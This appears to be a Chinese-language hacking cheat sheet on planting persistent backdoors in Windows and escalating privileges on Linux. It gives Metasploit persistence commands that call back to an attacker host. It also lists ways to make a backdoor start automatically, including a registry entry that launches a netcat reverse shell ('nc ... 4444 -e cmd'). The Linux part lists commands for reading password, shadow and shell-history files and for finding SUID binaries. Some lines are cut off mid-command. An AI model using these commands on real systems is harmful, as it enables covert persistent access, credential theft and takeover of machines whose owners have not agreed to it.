windows后门植入
持久化的监听:
handle:
1 | -H 配置RHOST/LHOST(用于监听) |
持久化后门
msf中的持久化后门:
run persistence
1 | -A 自动开启匹配的监听器等待用户连接 |
example: run persistence -U -X -i -r LHOST -p LPORT
其他的persistence模块: search persistence
自启动后门:
注册表的方式{自启动路径很多}、服务的方式{sc 创建服务}、自启动文件夹{shell:startup},计划任务(只能反弹一次,在指定的时间反弹)
注册表的方式: reg add HKLM\.... /v xxx /f /d nc 192.168.1.135 4444 -e cmd
linux提权
信息搜集
id 查看当前的用户所在的组别信息
uname -a 查看内核版本的全部信息
cat /proc/version 查看内核版本的全部信息
cat /etc/*release 查看发行版信息
dpkg -l 查看安装包(根据安装的包的版本找漏洞)
crontab 计划任务
1.指令的方式: crontab -e 计划任务的内容
2.以文件的形式写计划任务: /etc/crontab ,以这种方式写计划任务,指令看不到内容
/sbin/ifconfig 查看网络的配置信息
cat /etc/passwd 普通用户可以查看,内容是账号密码信息(密码放在shadow里)
1 | root:x:0:0:root:/root:/bin/bash |
cat /etc/shadow 特权用户才能查看,存放账号密码信息
cat /root/.mysql_history 查看数据库历史操作记录
数据库: 查看数据库内容,读取文件,上传文件,提取
cat /root/.bash_history 查看历史操作记录
find / -perm -u=s -type f 2>/dev/nul 查找具有suid应用程序(默认以root权限执行的程序)
1 | find 指令 |